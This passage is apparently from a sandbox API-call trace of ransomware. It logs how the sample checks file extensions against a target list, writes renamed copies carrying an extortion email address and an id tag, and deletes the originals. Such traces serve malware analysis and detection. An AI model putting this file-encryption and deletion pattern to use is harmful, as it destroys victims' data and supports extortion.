(lpString=".ppt") returned 4 [0056.818] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0056.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0056.818] lstrlenW (lpString=".zip") returned 4 [0056.818] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0056.818] lstrlenW (lpString=".rar") returned 4 [0056.818] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0056.818] lstrlenW (lpString=".bz2") returned 4 [0056.818] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0056.818] lstrlenW (lpString=".7z") returned 3 [0056.818] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0056.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0056.818] lstrlenW (lpString=".dbf") returned 4 [0056.818] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0056.909] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.909] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.909] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0056.910] GetLastError () returned 0x0 [0056.911] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x3bac, lpOverlapped=0x0) returned 1 [0056.930] WriteFile (in: hFile=0x34c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x3bb0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x3bb0, lpOverlapped=0x0) returned 1 [0056.931] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0056.931] WriteFile (in: hFile=0x34c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xee, lpOverlapped=0x0) returned 1 [0056.931] SetEndOfFile (hFile=0x34c) returned 1 [0056.932] CloseHandle (hObject=0x34c) returned 1 [0056.932] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.932] SetEndOfFile (hFile=0x340) returned 1 [0056.933] CloseHandle (hObject=0x340) returned 1 [0056.933] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0056.934] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif")) returned 1 [0056.934] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0056.934] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0056.934] lstrlenW (lpString=".doc") returned 4 [0056.934] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.934] lstrlenW (lpString=".docx") returned 5 [0056.934] lstrcmpiW (lpString1=".docx", lpString2="x.gif") returned -1 [0056.934] lstrlenW (lpString=".pdf") returned 4 [0056.934] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.934] lstrlenW (lpString=".xls") returned 4 [0056.934] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.934] lstrlenW (lpString=".xlsx") returned 5 [0056.934] lstrcmpiW (lpString1=".xlsx", lpString2="x.gif") returned -1 [0056.934] lstrlenW (lpString=".ppt") returned 4 [0056.934] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.934] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0056.934] lstrlenW (lpString=".zip") returned 4 [0056.934] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.934] lstrlenW (lpString=".rar") returned 4 [0056.934] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.934] lstrlenW (lpString=".bz2") returned 4 [0056.934] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.934] lstrlenW (lpString=".7z") returned 3 [0056.935] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.935] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0056.935] lstrlenW (lpString=".dbf") returned 4 [0056.935] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.935] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0056.935] lstrlenW (lpString=".1cd") returned 4 [0056.935] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.935] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0056.935] lstrlenW (lpString=".jpg") returned 4 [0056.935] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.935] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0056.935] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0056.935] lstrlenW (lpString=".doc") returned 4 [0056.935] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.935] lstrlenW (lpString=".docx") returned 5 [0056.935] lstrcmpiW (lpString1=".docx", lpString2="x.gif") returned -1 [0056.935] lstrlenW (lpString=".pdf") returned 4 [0056.935] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.935] lstrlenW (lpString=".xls") returned 4 [0056.935] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.935] lstrlenW (lpString=".xlsx") returned 5 [0056.935] lstrcmpiW (lpString1=".xlsx", lpString2="x.gif") returned -1 [0056.935] lstrlenW (lpString=".ppt") returned 4 [0056.935] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.935] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0056.935] lstrlenW (lpString=".zip") returned 4 [0056.935] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.935] lstrlenW (lpString=".rar") returned 4 [0056.935] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.935] lstrlenW (lpString=".bz2") returned 4 [0056.935] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.935] lstrlenW (lpString=".7z") returned 3 [0056.935] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.935] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0056.935] lstrlenW (lpString=".dbf") returned 4 [0056.935] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.936] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0056.936] lstrlenW (lpString=".1cd") returned 4 [0056.936] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.936] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0056.936] lstrlenW (lpString=".jpg") returned 4 [0056.936] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.936] lstrcmpiW (lpString1=".gif", lpString2=".bat") returned 1 [0056.936] lstrlenW (lpString="splash_11@2x-lic.gif") returned 20 [0056.936] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0056.936] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=12250) returned 1 [0056.936] CloseHandle (hObject=0x340) returned 1 [0056.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif")) returned 0x20 [0056.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.936] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0056.937] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.937] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.937] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0056.937] GetLastError () returned 0x0 [0056.937] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x2fda, lpOverlapped=0x0) returned 1 [0056.992] WriteFile (in: hFile=0x34c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x2fe0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x2fe0, lpOverlapped=0x0) returned 1 [0056.993] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0056.993] WriteFile (in: hFile=0x34c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xfc, lpOverlapped=0x0) returned 1 [0056.993] SetEndOfFile (hFile=0x34c) returned 1 [0056.994] CloseHandle (hObject=0x34c) returned 1 [0056.994] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.995] SetEndOfFile (hFile=0x340) returned 1 [0056.995] CloseHandle (hObject=0x340) returned 1 [0056.996] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0056.996] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif")) returned 1 [0056.996] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0056.996] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0056.996] lstrlenW (lpString=".doc") returned 4 [0056.996] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.996] lstrlenW (lpString=".docx") returned 5 [0056.996] lstrcmpiW (lpString1=".docx", lpString2="c.gif") returned -1 [0056.996] lstrlenW (lpString=".pdf") returned 4 [0056.997] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.997] lstrlenW (lpString=".xls") returned 4 [0056.997] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.997] lstrlenW (lpString=".xlsx") returned 5 [0056.997] lstrcmpiW (lpString1=".xlsx", lpString2="c.gif") returned -1 [0056.997] lstrlenW (lpString=".ppt") returned 4 [0056.997] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.997] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0056.997] lstrlenW (lpString=".zip") returned 4 [0056.997] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.997] lstrlenW (lpString=".rar") returned 4 [0056.997] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.997] lstrlenW (lpString=".bz2") returned 4 [0056.997] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.997] lstrlenW (lpString=".7z") returned 3 [0056.997] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.997] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0056.997] lstrlenW (lpString=".dbf") returned 4 [0056.997] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.997] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0056.997] lstrlenW (lpString=".1cd") returned 4 [0056.997] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.997] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0056.997] lstrlenW (lpString=".jpg") returned 4 [0056.997] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.997] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0056.997] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0056.997] lstrlenW (lpString=".doc") returned 4 [0056.997] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.998] lstrlenW (lpString=".docx") returned 5 [0056.998] lstrcmpiW (lpString1=".docx", lpString2="c.gif") returned -1 [0056.998] lstrlenW (lpString=".pdf") returned 4 [0056.998] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.998] lstrlenW (lpString=".xls") returned 4 [0056.998] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.998] lstrlenW (lpString=".xlsx") returned 5 [0056.998] lstrcmpiW (lpString1=".xlsx", lpString2="c.gif") returned -1 [0056.998] lstrlenW (lpString=".ppt") returned 4 [0056.998] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.998] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0056.998] lstrlenW (lpString=".zip") returned 4 [0056.998] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.998] lstrlenW (lpString=".rar") returned 4 [0056.998] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.998] lstrlenW (lpString=".bz2") returned 4 [0056.998] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.998] lstrlenW (lpString=".7z") returned 3 [0056.998] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.998] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0056.998] lstrlenW (lpString=".dbf") returned 4 [0056.998] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.998] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0056.998] lstrlenW (lpString=".1cd") returned 4 [0056.998] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.998] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0056.998] lstrlenW (lpString=".jpg") returned 4 [0056.998] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.999] lstrcmpiW (lpString1=".txt", lpString2=".bat") returned 1 [0056.999] lstrlenW (lpString="jvm.hprof.txt") returned 13 [0056.999] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0056.999] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=4226) returned 1 [0056.999] CloseHandle (hObject=0x340) returned 1 [0056.999] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt")) returned 0x20 [0056.999] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.999] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0056.999] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.000] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.000] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0057.000] GetLastError () returned 0x0 [0057.000] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1082, lpOverlapped=0x0) returned 1 [0057.065] WriteFile (in: hFile=0x34c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1090, lpOverlapped=0x0) returned 1 [0057.066] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0057.066] WriteFile (in: hFile=0x34c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xee, lpOverlapped=0x0) returned 1 [0057.066] SetEndOfFile (hFile=0x34c) returned 1 [0057.066] CloseHandle (hObject=0x34c) returned 1 [0057.067] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.067] SetEndOfFile (hFile=0x340) returned 1 [0057.068] CloseHandle (hObject=0x340) returned 1 [0057.068] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0057.068] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt")) returned 1 [0057.069] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0057.069] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0057.069] lstrlenW (lpString=".doc") returned 4 [0057.069] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0057.069] lstrlenW (lpString=".docx") returned 5 [0057.069] lstrcmpiW (lpString1=".docx", lpString2="f.txt") returned -1 [0057.069] lstrlenW (lpString=".pdf") returned 4 [0057.069] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0057.069] lstrlenW (lpString=".xls") returned 4 [0057.069] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0057.069] lstrlenW (lpString=".xlsx") returned 5 [0057.069] lstrcmpiW (lpString1=".xlsx", lpString2="f.txt") returned -1 [0057.069] lstrlenW (lpString=".ppt") returned 4 [0057.069] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0057.069] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0057.069] lstrlenW (lpString=".zip") returned 4 [0057.069] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0057.069] lstrlenW (lpString=".rar") returned 4 [0057.069] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0057.069] lstrlenW (lpString=".bz2") returned 4 [0057.069] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0057.069] lstrlenW (lpString=".7z") returned 3 [0057.069] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0057.069] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0057.069] lstrlenW (lpString=".dbf") returned 4 [0057.069] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0057.069] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0057.070] lstrlenW (lpString=".1cd") returned 4 [0057.070] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0057.070] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0057.070] lstrlenW (lpString=".jpg") returned 4 [0057.070] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0057.070] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0057.070] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0057.070] lstrlenW (lpString=".doc") returned 4 [0057.070] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0057.070] lstrlenW (lpString=".docx") returned 5 [0057.070] lstrcmpiW (lpString1=".docx", lpString2="f.txt") returned -1 [0057.070] lstrlenW (lpString=".pdf") returned 4 [0057.070] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0057.070] lstrlenW (lpString=".xls") returned 4 [0057.070] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0057.070] lstrlenW (lpString=".xlsx") returned 5 [0057.070] lstrcmpiW (lpString1=".xlsx", lpString2="f.txt") returned -1 [0057.070] lstrlenW (lpString=".ppt") returned 4 [0057.070] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0057.070] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0057.070] lstrlenW (lpString=".zip") returned 4 [0057.070] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0057.070] lstrlenW (lpString=".rar") returned 4 [0057.070] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0057.070] lstrlenW (lpString=".bz2") returned 4 [0057.070] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0057.070] lstrlenW (lpString=".7z") returned 3 [0057.070] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0057.070] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0057.071] lstrlenW (lpString=".dbf") returned 4 [0057.071] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0057.071] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0057.071] lstrlenW (lpString=".1cd") returned 4 [0057.071] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0057.071] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0057.071] lstrlenW (lpString=".jpg") returned 4 [0057.071] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0057.071] lstrcmpiW (lpString1=".html", lpString2=".bat") returned 1 [0057.071] lstrlenW (lpString="Welcome.html") returned 12 [0057.071] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0057.071] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=955) returned 1 [0057.071] CloseHandle (hObject=0x340) returned 1 [0057.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html")) returned 0x20 [0057.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.072] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0057.072] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.072] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, 